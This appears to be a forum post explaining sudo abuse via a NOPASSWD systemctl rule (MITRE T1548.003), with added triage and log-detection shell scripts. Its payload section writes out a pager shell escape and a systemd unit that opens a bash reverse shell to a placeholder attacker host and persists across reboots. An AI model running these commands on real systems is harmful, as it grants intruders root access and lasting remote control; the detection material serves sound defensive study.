10-07-25, 10:25 PM
Category: Persistence / Privilege Escalation / Evasion
Framework: MITRE ATT&CK
Technique: T1548.003 — Abuse Elevation Control Mechanism: Sudo and Sudo Caching (T1548.002 is the Windows UAC-bypass sibling, not the sudo one)
OS: Linux / Unix-like
Tech level: Intermediate–Advanced
Source: https://attack.mitre.org/techniques/T1548/003/
Overview
This sub-technique is all about abusing sudo to run commands as root (or another user). If an attacker gets a foothold as a user who appears in /etc/sudoers or /etc/sudoers.d/* with a NOPASSWD rule, they can escalate locally without knowing any password, and if the permitted binary lets them install a service or touch root-owned files they can also maintain persistence.
It doubles as evasion: the elevated commands run under sudo rather than under the compromised account's own uid, so detection keyed on what that user executes sees nothing unusual. What is left behind is the sudo line in auth.log or the journal and whatever the elevated command itself writes.
Real-world Example
Let’s say the attacker gets a shell (maybe via CVE or leaked creds) and lands as developer. They check sudo perms:
Quote:developer@target:~$ sudo -l
Matching Defaults entries for developer on target:
!requiretty, env_reset, env_keep+=SSH_AUTH_SOCK
User developer may run the following commands on target:
(ALL) NOPASSWD: /usr/bin/systemctl
Analysis
NOPASSWD means no password prompt, so the attacker needs nothing beyond the shell they already have; (ALL) additionally means the command may be run as any user, root included.
systemctl is a GTFOBins binary: run as root it can install and start an arbitrary unit file, and by extension get a root shell. What makes this rule abusable is that it grants the whole binary with no subcommand restriction; a rule limited to something like /usr/bin/systemctl restart myapp.service would close the routes used below.
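As an added example (not part of the original post), here is a small POSIX sh triage helper that reads `sudo -l` output and flags NOPASSWD rules whose target binary has a known shell escape. The sample output and the binary list are constructed assumptions: the list is a hand-picked subset of GTFOBins, extend it for real use.

```shell
#!/bin/sh
# Added example, not from the original post: triage `sudo -l` output for
# NOPASSWD rules that hand over a binary with a known shell escape.

# Constructed sample of `sudo -l` output (assumption: the format sudo prints,
# modelled on the post's example plus two extra rules).
SAMPLE_SUDO_L='Matching Defaults entries for developer on target:
    !requiretty, env_reset, env_keep+=SSH_AUTH_SOCK

User developer may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/systemctl
    (root) /usr/bin/apt-get
    (ALL : ALL) NOPASSWD: /usr/bin/vim, /bin/cat /var/log/syslog'

# Binaries with a documented root-shell escape (assumed subset of GTFOBins;
# "ALL" is the sudoers keyword for any command and is flagged as well).
ESCAPABLE='ALL systemctl vim vi less more man find awk python3 perl apt-get'

# flag_nopasswd "<sudo -l output>"
# Prints "<basename> <rule command>" for every NOPASSWD command whose
# basename is in ESCAPABLE. Rules that still require a password are skipped:
# they matter too, but only once the user's password is known.
flag_nopasswd() {
    # keep only the command list of each NOPASSWD line, one command per line
    printf '%s\n' "$1" |
    grep 'NOPASSWD:' |
    sed 's/.*NOPASSWD:[[:space:]]*//' |
    tr ',' '\n' |
    while IFS= read -r cmd; do
        # trim surrounding whitespace
        cmd=$(printf '%s' "$cmd" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')
        [ -n "$cmd" ] || continue
        # first word of the rule with the directory stripped
        bin=$(basename "${cmd%% *}")
        for e in $ESCAPABLE; do
            if [ "$bin" = "$e" ]; then
                printf '%s %s\n' "$bin" "$cmd"
                break
            fi
        done
    done
}

# Usage: on the constructed sample this prints the systemctl and vim rules.
flag_nopasswd "$SAMPLE_SUDO_L"
```

On a live box, feed it the real output with `flag_nopasswd "$(sudo -l 2>/dev/null)"`; every line it prints is a candidate to look up on GTFOBins.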
Privilege Escalation Payloads
Quickest route if you have a tty: systemctl with no arguments lists units through the default pager, and that pager runs as root, so a shell escape from the less prompt is a root shell (this is the systemctl entry on GTFOBins). env_reset means you cannot point PAGER at something else, so it relies on less being the default and not running with LESSSECURE set:
Quote:sudo /usr/bin/systemctl
!sh
Or go stealthy and persistent with a reverse shell service. systemctl link accepts a unit file from any absolute path, so a world-writable /tmp is enough:
Quote:echo -e "[Service]\nType=oneshot\nExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attackerip/4444 0>&1'\n[Install]\nWantedBy=multi-user.target" > /tmp/root.service
sudo /usr/bin/systemctl link /tmp/root.service
sudo /usr/bin/systemctl enable --now root.service
Result:
Reverse shell as root on the box. The enable --now call blocks while the oneshot unit is running, which is expected. Because the unit is enabled, it also fires again on every boot: that is the persistence half of the technique, and the reason to disable and unlink it when the engagement ends.
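From the defender's side, every one of the commands above leaves a sudo log line behind. The following is an added example, not from the original post: a POSIX sh filter over auth.log-style sudo lines that flags the bare systemctl call (pager escape) and any link/enable/edit of a unit, upgrading the finding when the unit path sits in a user-writable directory. The log lines and the writable-directory list are constructed assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: flag sudo log lines that match
# the systemctl abuse described above. Reads log lines on stdin.

# Constructed auth.log-style sudo lines (assumption: the field layout sudo logs
# via syslog; `journalctl _COMM=sudo` prints the same fields).
SAMPLE_AUTH_LOG='Jul 10 22:24:55 target sudo: developer : TTY=pts/0 ; PWD=/home/developer ; USER=root ; COMMAND=/usr/bin/systemctl status sshd.service
Jul 10 22:25:01 target sudo: developer : TTY=pts/0 ; PWD=/home/developer ; USER=root ; COMMAND=/usr/bin/systemctl link /tmp/root.service
Jul 10 22:25:02 target sudo: developer : TTY=pts/0 ; PWD=/home/developer ; USER=root ; COMMAND=/usr/bin/systemctl enable --now root.service
Jul 10 22:25:30 target sudo: developer : TTY=pts/0 ; PWD=/home/developer ; USER=root ; COMMAND=/usr/bin/systemctl
Jul 10 22:26:10 target sudo: ops : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx.service'

# Directories an unprivileged user can normally write to (assumed list).
WRITABLE_DIRS='/tmp/ /var/tmp/ /dev/shm/ /home/'

# flag_systemctl_abuse < logfile
# Prints "<reason>|<line>" for each sudo line that ran systemctl either with
# no arguments (pager escape) or to link/enable/edit a unit; the reason is
# upgraded when the unit path lives in a user-writable directory.
flag_systemctl_abuse() {
    while IFS= read -r line; do
        # only sudo lines whose COMMAND= is systemctl
        case "$line" in
            *" sudo"*"COMMAND="*systemctl*) ;;
            *) continue ;;
        esac
        # e.g. "/usr/bin/systemctl link /tmp/root.service"
        cmd=${line##*COMMAND=}
        # arguments after the binary; empty when systemctl ran bare
        args=${cmd#* }
        if [ "$args" = "$cmd" ]; then
            args=""
        fi
        reason=""
        case "$args" in
            "") reason="bare systemctl (pager escape)" ;;
            "link "*|"enable "*|"edit "*)
                reason="unit install via sudo"
                for d in $WRITABLE_DIRS; do
                    case "$args" in
                        *"$d"*) reason="unit file from user-writable path $d" ;;
                    esac
                done ;;
        esac
        if [ -n "$reason" ]; then
            printf '%s|%s\n' "$reason" "$line"
        fi
    done
}

# Usage: on the constructed sample this flags three of the five lines.
printf '%s\n' "$SAMPLE_AUTH_LOG" | flag_systemctl_abuse
```

The status and restart lines pass through untouched, which is the point: a rule that fires on every sudo systemctl call from an ops account is noise, while link/enable from /tmp and a bare systemctl from a NOPASSWD user are worth a ticket. Pair it with a file-integrity check on /etc/systemd/system for symlinks pointing outside /usr and /etc.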

References:
MITRE ATT&CK T1548.003 (Sudo and Sudo Caching): https://attack.mitre.org/techniques/T1548/003/
GTFOBins (systemctl): https://gtfobins.github.io/gtfobins/systemctl/
Red Team TTPs (HackTricks, Linux privilege escalation): https://book.hacktricks.xyz/linux-harden...escalation